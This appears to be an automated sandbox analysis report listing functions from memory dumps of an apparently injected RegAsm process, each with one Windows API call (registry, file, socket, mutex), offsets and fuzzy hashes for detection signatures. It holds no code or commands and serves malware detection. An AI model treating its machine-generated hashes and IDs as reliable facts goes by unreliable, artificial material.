Instruction ID: de42b9f20b50d82f360ddb483fb81bb1ba9346d957351dd0fa89849d54f3407f
Opcode Fuzzy Hash: e60868d8e592ef75f1992b8dff5b57c23aee0ec1e93c78994c5cbbd366ebdf52
Instruction Fuzzy Hash: D231E174E082498FC709DF74C4997EDBBF2AF49310F548069D505EB341EB359846CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DA8D9, Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1D7DA989

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: f6e967c2a5072a2d33a188995e3f6122e4693edb5a3966a9f05c1262887c26f5
Instruction ID: f398156304da157eed3d708159c791821ee27916b1a5f9ac3d73d469caccdc87
Opcode Fuzzy Hash: f6e967c2a5072a2d33a188995e3f6122e4693edb5a3966a9f05c1262887c26f5
Instruction Fuzzy Hash: F5317372504784AFE7228F15CC84F57BFB8EF05320F09859AE9859B152D224E949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CF0B84, Relevance: 1.6, APIs: 1, Instructions: 90fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 00CF0C25

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4a98e1b53896bc5b76b16ee10f0f9c43a8f028f7ae25d4e4202f2579f4e58de1
Instruction ID: 4ee4e71a7e90e4271cef9410963704bf58abbebe98fcbeee2aab82583df799cb
Opcode Fuzzy Hash: 4a98e1b53896bc5b76b16ee10f0f9c43a8f028f7ae25d4e4202f2579f4e58de1
Instruction Fuzzy Hash: F0317EB1504344AFE722CF25CD44B66BFE8EF05710F0885AEE9858B252D375E909CB72

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DA9D1, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 1D7DAA8C

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 8f6d63d1f5147a3f844e0235aaf6ed9f17e8d55e8e5683fc19044b6faf81dd23
Instruction ID: aa924bd6a9d9dacbb7f807b741761cb58dd10659a2f91e1bba9c445347960154
Opcode Fuzzy Hash: 8f6d63d1f5147a3f844e0235aaf6ed9f17e8d55e8e5683fc19044b6faf81dd23
Instruction Fuzzy Hash: DB3193711097846FE722CF25CC44F63BFF8EF46320F08859AE9858B153D264E949CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CF1EC0, Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000EB4), ref: 00CF1F57

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 5006db526984c9c3d3780053dee9b12c624b85b348c35a4d4bf9291363e2f4d8
Instruction ID: ae24093e40f66f8e53319f4ddf7da324753029486b9b54117447330b0a657a8f
Opcode Fuzzy Hash: 5006db526984c9c3d3780053dee9b12c624b85b348c35a4d4bf9291363e2f4d8
Instruction Fuzzy Hash: 90316172504345AFE7228F69DC45F67BFE8EF05320F0884AAED84DB152D364E919CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DB464, Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 1D7DB4FE

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 2178e75004f45f994a58b9d6842b155f2dbc6f567919bdc7b5a21a0bf0015943
Instruction ID: 3797f086459ed098947b001820839707a0f621c622df870e8269f85cbbc4d370
Opcode Fuzzy Hash: 2178e75004f45f994a58b9d6842b155f2dbc6f567919bdc7b5a21a0bf0015943
Instruction Fuzzy Hash: B121B6B25097846FE7128F25DC45B66BFB8EF06320F0884ABE985DB193C264D905C761

Uniqueness

Uniqueness Score: -1.00%

Function 00D05576, Relevance: 1.6, APIs: 1, Instructions: 87threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00D05615

Memory Dump Source

Source File: 00000007.00000002.1031529971.0000000000D05000.00000040.00000001.sdmp, Offset: 00D05000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d05000_RegAsm.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: db923f3d8fc111881293f7206e0796f3f28b89684ab07a9101821b89104f26b1
Instruction ID: be071a4b3361a7cf5f0ae5f2afc87c165bdb317c5ed8d4790f1b54342ace9a36
Opcode Fuzzy Hash: db923f3d8fc111881293f7206e0796f3f28b89684ab07a9101821b89104f26b1
Instruction Fuzzy Hash: 43214C35008B07D1C7981A088E381EAFFE1AF4B21AB706180C7D9098E08F334CC5E318

Uniqueness

Uniqueness Score: -1.00%

Function 00CF1DC2, Relevance: 1.6, APIs: 1, Instructions: 87registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF1E6C

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: ebc49392e1041d95abc1d1c286a970e0802ee4ac749c1481ef5726211c6b2501
Instruction ID: 6db8c2b79912e25bc5594613d4ba0e3493123a18b19949896c5d324a2ae48895
Opcode Fuzzy Hash: ebc49392e1041d95abc1d1c286a970e0802ee4ac749c1481ef5726211c6b2501
Instruction Fuzzy Hash: 5C315076509784AFE722CB25DC44FA3BFF8EF06310F0884DAE9859B153D264E949C762

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2158, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 00CF220A

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 05ff0ea59d55f31101e082e36510f8042dddfe942a5017835d89756805dec4cc
Instruction ID: 62c469663dba7c1c9b8525a85a4c57db1304d1577493e45b3279c4fa895fb058
Opcode Fuzzy Hash: 05ff0ea59d55f31101e082e36510f8042dddfe942a5017835d89756805dec4cc
Instruction Fuzzy Hash: 3231B1B2404784AFE722CB55DC85F56FFF8EF06320F08859AE9848B163D375A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CF240D, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 00CF24AD

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: d54f5e7a868055d30d8c4e1d29918cbf39eb8824658ba34e87d1b8a2b61c19c4
Instruction ID: 3df30b93fdd74d0b4795950fde5a4fcd4f0f39459950808b108c1d3b613d6a32
Opcode Fuzzy Hash: d54f5e7a868055d30d8c4e1d29918cbf39eb8824658ba34e87d1b8a2b61c19c4
Instruction Fuzzy Hash: 943184B1505784AFE722CF25DC45F56FFE8EF05310F08849AE9849B292D375E904CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CF288A, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000EB4), ref: 00CF292F

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 57fa02d27aa1721df09f249e0b24cdf5b3ccd75aaf7f669c430575fbfeeca96f
Instruction ID: 4b6183968bba191d460de0261881922cfd3629e50413edc33ca2948a95ab5e5b
Opcode Fuzzy Hash: 57fa02d27aa1721df09f249e0b24cdf5b3ccd75aaf7f669c430575fbfeeca96f
Instruction Fuzzy Hash: C921D371500305AFFB31DF55DC84FAAFBACEF04720F14885AEA449B181D2B4A945CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00CF1598, Relevance: 1.6, APIs: 1, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF1634

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: e6e9fcb6debf6771c812eca27a10884cccef476eeb7a279c0fe772911551e58d
Instruction ID: b86a2d86eec138a3ed521d6a501ae6590b84ba5edaf668fe224ca2cc50e3ce1c
Opcode Fuzzy Hash: e6e9fcb6debf6771c812eca27a10884cccef476eeb7a279c0fe772911551e58d
Instruction Fuzzy Hash: 992150B1109384AFD7228F65DC44F67BFB8EF06610F08849AE985DB152D224E948C762

Uniqueness

Uniqueness Score: -1.00%

Function 00CF1496, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 00CF152A

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 885e2dc09f073f0d4e14094da4d54f88abdc3fba6880c1f757f630b7d11b4da8
Instruction ID: 8d860bfb0cb0d5e7437ed5496f283dafc2d1604056fa161bfa7c97b8f119da83
Opcode Fuzzy Hash: 885e2dc09f073f0d4e14094da4d54f88abdc3fba6880c1f757f630b7d11b4da8
Instruction Fuzzy Hash: A4219FB2504744AFE722CF25DC45F67FFA8EF45320F0888AAED459B152D274E909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DB55D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 1D7DB5EE

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 353d4652ad7b876ea61b4eb799d139b53b522ace0d932ec2382e857326d623db
Instruction ID: 1b2ddb356dcc81ccea969d19fc8719da2655e67d721fc4879218a44558b90117
Opcode Fuzzy Hash: 353d4652ad7b876ea61b4eb799d139b53b522ace0d932ec2382e857326d623db
Instruction Fuzzy Hash: 442191B1509384AFE712CF25DC45F66BFB8EF46320F0884AAE945DB152D264E908CB72

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DA120, Relevance: 1.6, APIs: 1, Instructions: 82fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNEL32(?,00000EB4,?,?), ref: 1D7DA1C2

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 42e9b81d448460b8120377cac58474be7c595743cdafe2f862077959e40bd825
Instruction ID: 35d789dce2ad44d31df1d1add9990230415419faea5592056a83a4916186dd8d
Opcode Fuzzy Hash: 42e9b81d448460b8120377cac58474be7c595743cdafe2f862077959e40bd825
Instruction Fuzzy Hash: 6321BF7140D3C06FD7128B358C51BA6BFB4EF47620F0985DBD8C48F193D225A919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DB654, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000EB4,?,?), ref: 1D7DB6FA

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: ef26d670de00306e6e40bb230bf3a9af9e0125c5d418cbcd672510df9c4a4468
Instruction ID: 3fa20cfb756bfadfea9c45fa678025dff57b212cf07faec4240dc3b1f4767be6
Opcode Fuzzy Hash: ef26d670de00306e6e40bb230bf3a9af9e0125c5d418cbcd672510df9c4a4468
Instruction Fuzzy Hash: 0121AD714093C4AFD3128B65CC55B66BFB4EF87610F0984DBD8848B1A3D224A919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00CF25E8, Relevance: 1.6, APIs: 1, Instructions: 79timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF2671

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 48071eb53aa9e08e7212477035ca12aa9d9b95e11911dbd2baa024caa2bf2132
Instruction ID: 796dc961d0b8200e59ccfd963b894e65c1c68c6ec002ca790f80dc0a5dc55b36
Opcode Fuzzy Hash: 48071eb53aa9e08e7212477035ca12aa9d9b95e11911dbd2baa024caa2bf2132
Instruction Fuzzy Hash: CF21B271105384AFEB228F25DC44F67BFB8EF06310F0884AAE9459B152D234A909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CF13C4, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000EB4,?,?), ref: 00CF146A

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: b077b6f6fe0ca69e09f4693ef1035d50dd0e58e1980ce45a3fd6e5120ced1a7b
Instruction ID: 40c4724bfbc912db315508e55fd303f1ab18dabc159550b51b78df993e979714
Opcode Fuzzy Hash: b077b6f6fe0ca69e09f4693ef1035d50dd0e58e1980ce45a3fd6e5120ced1a7b
Instruction Fuzzy Hash: FD21607550E3C46FC3138B358C55A12BFB4EF47610F1D81DFD8848B5A3D225A91AC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2076, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 00CF2101

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 56a2267dc37cc1e8aac7e0099e9099092c03092d973f1cb47c009b65ad8789ed
Instruction ID: bc2c5976cb3a82f68df71aa0b65c0920a82151367bbf00212dd9de55760ac66d
Opcode Fuzzy Hash: 56a2267dc37cc1e8aac7e0099e9099092c03092d973f1cb47c009b65ad8789ed
Instruction Fuzzy Hash: 9A2194B1505384AFE721CB15CC45F66FFA8EF05310F08849EE9858B252D375E904C765

Uniqueness

Uniqueness Score: -1.00%

Function 00CF0C7C, Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF0D11

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 46068ff0b9edc457ace16bb784220b99040c091eed7f5824db91a28650960839
Instruction ID: 7c8ba2a676372dddbca35859233e5d63a882f09950f4ed57fc175fdf5efdb41f
Opcode Fuzzy Hash: 46068ff0b9edc457ace16bb784220b99040c091eed7f5824db91a28650960839
Instruction Fuzzy Hash: A821F8B64087846FE712CB259C40BA3BFB8EF46720F1884DAE9849B197D224A909C771

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DB2C4, Relevance: 1.6, APIs: 1, Instructions: 76registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,?,?), ref: 1D7DB35E

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 9ec8670b3187ae3293a105b5b4d7e5b842a04b75c853908f844d0511e9088c1b
Instruction ID: e26d377db71e0e5ff309386064c88a4f8f0e798c815fe1829c5e8ac84db8a2e3
Opcode Fuzzy Hash: 9ec8670b3187ae3293a105b5b4d7e5b842a04b75c853908f844d0511e9088c1b
Instruction Fuzzy Hash: 0F21C8755093C06FD3138B259C51B62BFB4EF47A20F0981DBE9848B653D225A919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 00CF1EE6, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000EB4), ref: 00CF1F57

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: b34e6303ffab8804083acd6f1ad084fb6fe1074b975b5b1e0739b28dd149fd8d
Instruction ID: f8ef89df4205c1847fcc00ac3a648a36d12157bd06677e49e50c85b269d91d1f
Opcode Fuzzy Hash: b34e6303ffab8804083acd6f1ad084fb6fe1074b975b5b1e0739b28dd149fd8d
Instruction Fuzzy Hash: 8A219571600308AFEB60DF69DC85F66BB9CEF04720F18846AED45DB541D774E9058A72

Uniqueness

Uniqueness Score: -1.00%

Function 00CF04F0, Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000EB4), ref: 00CF058B

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b54b294182d5acf311e58492c24311d9a5da4de2b487dcf9fdc538f089c84925
Instruction ID: a6e26d9adf2482115c66f871aae12fd6d59d6ac97d15831f9089cc66db0b30e5
Opcode Fuzzy Hash: b54b294182d5acf311e58492c24311d9a5da4de2b487dcf9fdc538f089c84925
Instruction Fuzzy Hash: EC21F5710083846FE7228B14CC45FA6BFB8EF06720F1880DAE9845F193C2A4A949CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00CF0BA6, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 00CF0C25

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ccc93b65299b68a00a39f69ce5565b048711724eabbbf46244b5c7e4c3abf5c4
Instruction ID: 5b66e4088a10f9e9d071e7e335cf9d65715d0835a5d720b4cbc7d477779a4adc
Opcode Fuzzy Hash: ccc93b65299b68a00a39f69ce5565b048711724eabbbf46244b5c7e4c3abf5c4
Instruction Fuzzy Hash: 9021AE71600704AFEB61CF66CD84B66FBE8EF04710F14856AEA858B652D375E904CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2A3A, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF2AC3

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: d1e71c4647bcd146575640ba251a90f00a063330f0bfdd0e5598b5fd0e2ef0e0
Instruction ID: 2f99aba4563536dd467b7e6d594782e91b9296e8e5b3d8694967a1f29763f41b
Opcode Fuzzy Hash: d1e71c4647bcd146575640ba251a90f00a063330f0bfdd0e5598b5fd0e2ef0e0
Instruction Fuzzy Hash: BE2141B14093846FE722CF659C85B96BFB8EF46310F0884DBE9859F193D275A908C762

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DA90A, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1D7DA989

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8077699fc9e101674efbe60d861bb8452fa7679846cc3c39766e2ba8658cd3f7
Instruction ID: c1c4a3e5bee2955c66aa398ca7a5d40c12eef31936cbbc3e6b9c38b067335e6a
Opcode Fuzzy Hash: 8077699fc9e101674efbe60d861bb8452fa7679846cc3c39766e2ba8658cd3f7
Instruction Fuzzy Hash: 33219FB2500704AEE7219F55CC84F6BFBECEF14720F04885AED449B641D664E509CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2DD4, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF2E69

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: a16ea2a6b5ba5d9406958c6255d6c15ac354922ac8357c28bfb9ae606140bf0c
Instruction ID: 99d5d16ca9841b51bf33a6944b88b1d7141ed063bc94a2e11ff560bce2777c2e
Opcode Fuzzy Hash: a16ea2a6b5ba5d9406958c6255d6c15ac354922ac8357c28bfb9ae606140bf0c
Instruction Fuzzy Hash: 9521A4724097846FE7228B15DC45F66BFB8EF46314F09849AE9845B153C265A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CF14B6, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 00CF152A

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 7510a66a309ebd4198b16b1c1bafbb67b4fcd81f9c74b40a81cad2d3bd08dc28
Instruction ID: 12b070b5c2c3cae7508c7143a344c5e137ea82a39eb6ff4a77a49b627df1c00d
Opcode Fuzzy Hash: 7510a66a309ebd4198b16b1c1bafbb67b4fcd81f9c74b40a81cad2d3bd08dc28
Instruction Fuzzy Hash: 6D21C6B2500708AFE721CF55DC45F76FBA8EF44720F18846AED459B641D274E905CA72

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2D06, Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF2D8A

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: ca6a918428e8084677abda2e6a06339e11c5a9f76cdd0ef7b861d7c1083d2ba5
Instruction ID: 2704a5c85ca1db0d99b07d585bf7594c2e21e6230e50c679e246f0c28a9c6b58
Opcode Fuzzy Hash: ca6a918428e8084677abda2e6a06339e11c5a9f76cdd0ef7b861d7c1083d2ba5
Instruction Fuzzy Hash: 74214FB2505384AFE722CF65DD44F97BBA8EF45320F0884ABE9459B152D274E508CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00CF0E2E, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF0EAD

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: a8406014f8d316110bce1a1cefa95051a19bcb3510b3d5dd0cbdd07f7db7936b
Instruction ID: b8f8ccbb020352b1adcec3d683ade7653ba283cc66451c6d43080fa387a4f554
Opcode Fuzzy Hash: a8406014f8d316110bce1a1cefa95051a19bcb3510b3d5dd0cbdd07f7db7936b
Instruction Fuzzy Hash: 652196B2404344AFE722CF55DD44FA7BFA8EF45720F0484AAFD859B152D275A908CB71

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DACEF, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1D7DAD6A

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 028262fd9637338f95c4c6163eca3344b731c5c8e256b10f491c0a7fedea8cb9
Instruction ID: d241695a59a703370610d0fb8119f59b9aefcd79f94166d8f18da54abe18f23f
Opcode Fuzzy Hash: 028262fd9637338f95c4c6163eca3344b731c5c8e256b10f491c0a7fedea8cb9
Instruction Fuzzy Hash: 7B217FB65097805FD7528B65DC85B93BFA8EF12220F0984EBE885CF263D274D808C762

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2B46, Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

